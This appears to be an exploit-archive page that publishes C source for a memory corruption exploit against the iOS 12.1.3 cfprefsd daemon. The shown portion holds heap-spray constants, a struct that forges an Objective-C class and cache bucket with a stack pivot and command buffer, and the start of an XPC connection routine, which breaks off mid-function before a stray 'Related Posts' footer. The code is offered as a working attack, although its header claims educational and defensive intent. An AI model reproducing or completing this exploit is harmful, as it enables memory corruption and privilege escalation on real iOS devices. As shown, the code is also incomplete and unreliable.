iOS 12.1.3 cfprefsd Memory Corruption

iOS version 12.1.3 cfprefsd memory corruption exploit.


MD5 | 5f2945567a2b5f4158fe44116484e39d

// (c) 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes
// Intended only for educational and defensive purposes only.
// Use at your own risk.

#include <xpc/xpc.h>
#import <pthread.h>
#include <mach/mach.h>
#include <mach/task.h>
#include <dlfcn.h>
#include <mach-o/dyld_images.h>
#include <objc/runtime.h>

#define AGENT 1

#define FILL_DICT_COUNT 0x600
#define FILL_COUNT 0x1000
#define FREE_COUNT 0x2000
#define FILL_SIZE (0xc0)

int need_stop = 0;

struct heap_spray {
void* fake_objc_class_ptr;
uint32_t r10;
uint32_t r4;
void* fake_sel_addr;
uint32_t r5;
uint32_t r6;
uint64_t cmd;
uint8_t pad1[0x3c];
uint32_t stack_pivot;
struct fake_objc_class_t {
char pad[0x8];
void* cache_buckets_ptr;
uint32_t cache_bucket_mask;
} fake_objc_class;
struct fake_cache_bucket_t {
void* cached_sel;
void* cached_function;
} fake_cache_bucket;
char command[32];
};

void fill_once(){

#if AGENT
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
#else
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
Related Posts